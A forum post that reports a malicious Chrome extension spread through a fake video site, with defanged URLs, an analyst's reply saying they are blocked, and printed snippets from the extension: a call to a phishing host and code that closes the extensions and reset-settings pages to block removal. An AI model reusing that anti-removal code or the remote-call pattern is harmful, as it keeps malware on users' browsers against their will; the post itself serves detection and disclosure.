Fake Facebook not detected

hxxp://amk-mt2.com/

If you view the website in Chrome and you try play the video, it will ask you to install “Facebook Video Plugin” extension:

hxxps://chrome.google.com/webstore/detail/facebook-video-plugin/akagdpdjofpfkeolfhccmfbahdeokpog

This extension will inject some javascripts (main target sites are the Facebook and Twitter).
Currently the javascript for Facebook:

removed

This script will send messages to your chat partners. And also check this function in it:

function qweqwexd(){ qwecek("hxxp://fun-metin2.com/"+Math.random(0, 9999)); }

Another fake site, and it’s already detected as phishing site by BitDefender.

The injected script for Facebook comes from here:

hxxp://www.amk-mt2.com/user/s.php

The Twitter injector is inactive now, but here is the location:

hxxp://www.amk-mt2.com/user/t.php

The extension also will block the extensions page (so you can’t uninstall it from there) with this code:

if(n["url"]["indexOf"]("chrome://extension")>=0||n["url"]["indexOf"]("chrome://chrome/extension")>=0||n["url"]["indexOf"]("chrome://settings/resetProfileSettings")>=0) { chrome["tabs"]["remove"](n["id"]); }

Reported to virus AT avast DOT com

Hi,
Thanks for the report!

I blocked
hxxp://www.adanalibela.com/?bencegomik
hxxp://amk-mt2.com/user/s.php
hxxp://fun-metin2.com/1111

and created detections for the malicious JS code!

Thanks Honza.Its great to see the avast lab analysts be more active around here.Keep it up :slight_smile: